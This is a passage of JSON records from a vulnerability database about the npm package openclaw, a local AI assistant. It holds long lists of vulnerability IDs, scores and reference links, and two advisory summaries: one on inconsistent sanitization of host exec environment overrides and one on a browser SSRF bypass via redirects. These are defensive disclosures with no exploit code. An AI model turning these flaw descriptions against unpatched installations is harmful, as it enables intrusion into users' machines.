"vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-34503", "GHSA-2pr2-hcv6-7gwv" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gvam-2net-8kc5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91383?format=api", "vulnerability_id": "VCID-h9g5-xe4k-6udx", "summary": "OpenClaw has Inconsistent Host Exec Environment Override Sanitization\n## Summary\nGateway host exec env override handling did not consistently apply the shared host environment policy, so blocked or malformed override keys could slip through inconsistent sanitization paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7abfff756d6c68d17e21d1657bbacbaec86de232`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/host-env-security.ts now provides one shared sanitizer and fail-closed diagnostics for blocked or malformed override keys.\n- src/agents/bash-tools.exec.ts and src/node-host/invoke-system-run.ts both route env overrides through the shared sanitizer before execution.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35650", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.23939", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.2399", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.24008", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35650" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35650", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35650" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization" }, { "reference_url": "https://github.com/advisories/GHSA-39pp-xp36-q6mg", "reference_id": "GHSA-39pp-xp36-q6mg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-39pp-xp36-q6mg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35650", "GHSA-39pp-xp36-q6mg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h9g5-xe4k-6udx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89343?format=api", "vulnerability_id": "VCID-haxd-ps1x-h3ch", "summary": "OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable\n## Impact\n\nStrict browser SSRF bypass in Playwright redirect handling leaves private targets reachable.\n\nStrict browser SSRF checks could miss Playwright request-time navigation to private targets.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.3.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42430", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10088", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10118", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10102", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42430" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", 